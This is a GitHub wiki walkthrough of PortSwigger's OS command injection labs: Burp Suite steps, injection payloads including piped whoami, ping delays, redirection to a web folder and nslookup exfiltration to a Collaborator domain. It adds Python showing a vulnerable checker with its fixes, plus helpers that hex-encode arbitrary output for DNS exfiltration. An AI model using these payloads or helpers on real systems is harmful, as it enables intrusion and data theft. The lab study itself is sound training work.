OS Command Injection - NANDITHA90/PortSwigger-LABS GitHub Wiki

LAB - 1

OS command injection, simple case

  • About

    • This lab contains an OS command injection vulnerability in the product stock checker.
    • The application executes a shell command containing user-supplied product and store IDs and returns the raw output from the command in its response.
    • To solve the lab, execute the whoami command to determine the name of the current user.

(a) Using Burp Suite to Intercept and Modify a Request (Check Stock)

  • Intercept the Check stock request in Burp Suite Proxy and send it to Repeater


  • Modify the productId parameter: productId=1|whoami

    • The | ends the stock lookup command and pipes its output into whoami, so the response carries whoami's output (the account the web application runs as) instead of a stock level.


SOLVED

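To see why 1|whoami works and what the fix looks like, here is an added example that is not part of the lab or of this wiki: a Python stand-in for the stock checker that builds the command the way the vulnerable application does, next to two hardened versions. The echo-based backend, the STOCK_CMD string, the argument order and the function names are constructed for the example; the real lab's program is not visible to the tester.

```python
import re
import shlex
import subprocess

# Constructed stand-in for the lab's stock-report backend. The real lab runs a
# stock lookup program; here it is just `echo`, so the example runs offline and
# the only thing that matters is how the user-controlled IDs reach the shell.
STOCK_CMD = "echo stock-level-for"


def current_user() -> str:
    """Whatever whoami prints for this process (name, or an error if the uid
    has no passwd entry), so the test can compare the injected result to it."""
    proc = subprocess.run(["whoami"], capture_output=True, text=True)
    return (proc.stdout + proc.stderr).strip()


def check_stock_vulnerable(product_id: str, store_id: str) -> str:
    """The lab's flaw: both IDs are concatenated into one command string that
    is handed to /bin/sh, so shell metacharacters in either ID are interpreted.
    productId=1|whoami pipes the stock output into whoami, and the response
    carries whoami's output instead."""
    cmd = f"{STOCK_CMD} {store_id} {product_id}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def check_stock_argv_only(product_id: str, store_id: str) -> str:
    """First layer of defence: pass the IDs as separate argv entries with no
    shell involved. The same payload is now a literal argument; nothing is
    executed, although the garbage value still reaches the backend."""
    argv = shlex.split(STOCK_CMD) + [store_id, product_id]
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def check_stock_fixed(product_id: str, store_id: str) -> str:
    """Hardened version: strict allow-list validation (the IDs are numeric)
    on top of the argv call, so malformed input is rejected before any
    process is started."""
    for name, value in (("productId", product_id), ("storeId", store_id)):
        if not re.fullmatch(r"[0-9]{1,6}", value):
            raise ValueError(f"{name} must be 1-6 digits, got {value!r}")
    argv = shlex.split(STOCK_CMD) + [store_id, product_id]
    proc = subprocess.run(argv, capture_output=True, text=True, check=True)
    return proc.stdout


if __name__ == "__main__":
    payload = "1|whoami"
    print("vulnerable :", check_stock_vulnerable(payload, "1").strip())
    print("argv only  :", check_stock_argv_only(payload, "1").strip())
    try:
        check_stock_fixed(payload, "1")
    except ValueError as exc:
        print("fixed      : rejected ->", exc)
```

Run it as a script: the vulnerable function prints the current user, the argv-only function prints the payload back as harmless text, and the fixed function refuses the input. Validation alone is not enough (an allow-list that is later loosened reopens the hole) and argv alone still lets junk reach the backend, which is why both are combined.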


LAB - 2

Blind OS command injection with time delays

  • About

    • This lab contains a blind OS command injection vulnerability in the feedback function.
    • The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.
    • To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay.

(a) Using Burp Suite to Intercept and Modify a Request (Submit Feedback)

  • Intercept the Submit feedback request in Burp Suite Proxy and send it to Repeater


  • Modify the email parameter: email=x||ping+-c+10+127.0.0.1||

    • The + signs are URL-encoded spaces. || separates commands: the shell runs the right-hand side when the left-hand side fails, and the trailing || makes whatever the application appends to the command line a separate command rather than extra arguments to ping, so the injected command stays syntactically valid.

    • ping -c 10 127.0.0.1 sends ten echo requests one second apart, so the server-side command takes about 10 seconds to finish.

The response arrives only after that delay (about 10 seconds). Compare with the response time of a normal submission to confirm the delay comes from the payload and not from the network.


SOLVED



LAB - 3

Blind OS command injection with output redirection

  • About

    • This lab contains a blind OS command injection vulnerability in the feedback function.
    • The application executes a shell command containing the user-supplied details.
    • The output from the command is not returned in the response.
    • However, you can use output redirection to capture the output from the command. There is a writable folder at: /var/www/images/
    • The application serves the images for the product catalog from this location.
    • You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.
    • To solve the lab, execute the whoami command and retrieve the output.

(a) Using Burp Suite to Intercept and Modify a Request (Submit Feedback)

  • Intercept the Submit feedback request in Burp Suite Proxy and send it to Repeater


  • Modify the email parameter: email=||whoami>/var/www/images/output.txt||

    • > redirects the output of whoami into a file in the writable images folder; the feedback response itself still returns nothing.


  • At Proxy

    • Load a product page so the browser requests a catalog image, and intercept that image request (the one carrying the filename parameter)

    • Send it to the Repeater

    • Modify the filename parameter to the file written above: filename=output.txt

    • The response body is the content of output.txt, i.e. the output of whoami


SOLVED



LAB - 4

Blind OS command injection with out-of-band interaction

  • About

    • This lab contains a blind OS command injection vulnerability in the feedback function.
    • The application executes a shell command containing the user-supplied details.
    • The command is executed asynchronously and has no effect on the application's response.
    • It is not possible to redirect output into a location that you can access.
    • However, you can trigger out-of-band interactions with an external domain.
    • To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

(a) Using Burp Suite to Intercept and Modify a Request (Submit Feedback)

  • Intercept the Submit feedback request in Burp Suite Proxy and send it to Repeater


  • Modify the email parameter: email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

    • nslookup makes the target resolve the hostname; the lookup reaches Burp Collaborator's DNS server and is recorded as an interaction even though nothing from the command ever appears in the response.


  • Right-click the BURP-COLLABORATOR-SUBDOMAIN placeholder, select Insert Collaborator payload, and send the request


SOLVED


LAB - 5

Blind OS command injection with out-of-band data exfiltration

  • About

    • This lab contains a blind OS command injection vulnerability in the feedback function.
    • The application executes a shell command containing the user-supplied details.
    • The command is executed asynchronously and has no effect on the application's response.
    • It is not possible to redirect output into a location that you can access.
    • However, you can trigger out-of-band interactions with an external domain.
    • To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator.
    • You will need to enter the name of the current user to complete the lab.

(a) Using Burp Suite to Intercept and Modify a Request (Submit Feedback)

  • Intercept the Submit feedback request in Burp Suite Proxy and send it to Repeater


  • Go to the Collaborator tab.

  • Click Copy to clipboard to copy a unique Burp Collaborator payload to your clipboard.


  • Modify the email parameter, changing it to something like the following, but insert your Burp Collaborator subdomain where indicated:

    • email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||

    • The backticks matter: the shell runs whoami first and substitutes its output into the hostname, so the user name becomes the leftmost DNS label. Without them the literal name whoami.BURP-COLLABORATOR-SUBDOMAIN is looked up and nothing is exfiltrated. $(whoami) does the same job; if the request has to be URL-encoded, a backtick is %60.


  • Paste the Collaborator subdomain copied earlier in place of BURP-COLLABORATOR-SUBDOMAIN and send the request.


  • Go back to the Collaborator tab, and click Poll now.

  • You should see some DNS interactions that were initiated by the application as the result of your payload.


  • If you don't see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously.

  • Observe that the output from your command appears in the subdomain of the interaction, and you can view this within the Collaborator tab.

  • The full domain name that was looked up is shown in the Description tab for the interaction.


  • In this walkthrough the looked-up name began with the user name: peter-GZfOVi


  • To complete the lab, enter the name of the current user.


SOLVED
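Added example, not from the lab or this wiki: Python helpers that build the Lab 5 payload with its backticks, show which command output can travel as a DNS label, and recover the exfiltrated value from the hostnames listed in the Collaborator tab. It goes beyond the lab in one respect: the hex-label functions handle output that is not DNS-safe (anything with spaces, colons or slashes), which whoami never produces; producing that encoding on the target is not covered here. The Collaborator domain abc123.oastify.com, the sample hostnames and the /etc/passwd-style line are constructed for the example.

```python
import re
from typing import Dict, Iterable, List

# Constructed Collaborator domain used throughout this example; a real one is
# copied from the Collaborator tab in Burp Suite.
COLLAB_DOMAIN = "abc123.oastify.com"

# One DNS label holds at most 63 octets of letters, digits and hyphens.
LABEL_RE = re.compile(r"^[A-Za-z0-9-]{1,63}$")

# Hex characters per label; leaves room for an "NNN-" sequence prefix under 63.
LABEL_PAYLOAD = 56


def exfil_payload(command: str, collab_domain: str) -> str:
    """Lab 5's payload with the backticks that are easy to lose in rendering:
    the shell runs `command` first and splices its stdout into the hostname
    that nslookup then resolves."""
    return f"||nslookup `{command}`.{collab_domain}||"


def expected_lookup(command_output: str, collab_domain: str) -> str:
    """Hostname the target will resolve for a given command output, or a
    ValueError if that output cannot travel as one DNS label. whoami output
    qualifies; a line of /etc/passwd (colons, slashes) does not."""
    value = command_output.strip()
    if not LABEL_RE.match(value):
        raise ValueError(f"not a valid DNS label, encode it first: {value!r}")
    return f"{value}.{collab_domain}"


def recover_labels(hostnames: Iterable[str], collab_domain: str) -> List[str]:
    """Pull the exfiltrated prefix out of each looked-up hostname. Resolvers
    retry and re-query, so Collaborator usually logs the same name several
    times; duplicates are dropped and first-seen order is kept. Case is
    preserved because a user name such as peter-GZfOVi is case-sensitive."""
    suffix = "." + collab_domain.lower()
    seen: List[str] = []
    for host in hostnames:
        host = host.rstrip(".")            # tolerate a trailing root dot
        if not host.lower().endswith(suffix):
            continue                       # unrelated interaction
        prefix = host[: -len(suffix)]
        if prefix and prefix not in seen:
            seen.append(prefix)
    return seen


def hex_labels(data: bytes, chunk: int = LABEL_PAYLOAD) -> List[str]:
    """Encode arbitrary output so it can ride in DNS labels: hex keeps every
    byte in [0-9a-f], and a numeric prefix lets the receiver reorder and
    de-duplicate. Hex is also case-insensitive, so resolvers that randomise
    case (0x20 encoding) cannot corrupt it the way they could a raw name."""
    hexed = data.hex()
    return [f"{i}-{hexed[pos:pos + chunk]}"
            for i, pos in enumerate(range(0, len(hexed), chunk))]


def decode_hex_labels(labels: Iterable[str]) -> bytes:
    """Reverse hex_labels on whatever recover_labels returned, tolerating
    duplicates, out-of-order arrival and case changes; labels without a
    numeric prefix (such as a plain whoami result) are ignored."""
    parts: Dict[int, str] = {}
    for label in labels:
        seq, _, body = label.partition("-")
        if seq.isdigit() and body:
            parts[int(seq)] = body.lower()
    return bytes.fromhex("".join(parts[i] for i in sorted(parts)))


if __name__ == "__main__":
    print(exfil_payload("whoami", COLLAB_DOMAIN))
    # Constructed interaction log: the same lookup seen three times plus noise.
    log = ["peter-GZfOVi.abc123.oastify.com", "peter-GZfOVi.abc123.oastify.com.",
           "peter-GZfOVi.abc123.oastify.com", "unrelated.example.com"]
    print(recover_labels(log, COLLAB_DOMAIN))
```

When reading the Collaborator tab, check the Description of each DNS interaction for the full name as in the lab, and expect several entries per lookup; recover_labels collapses them. If the output you want to exfiltrate fails expected_lookup, it needs an encoding step on the target before it can be placed in a hostname.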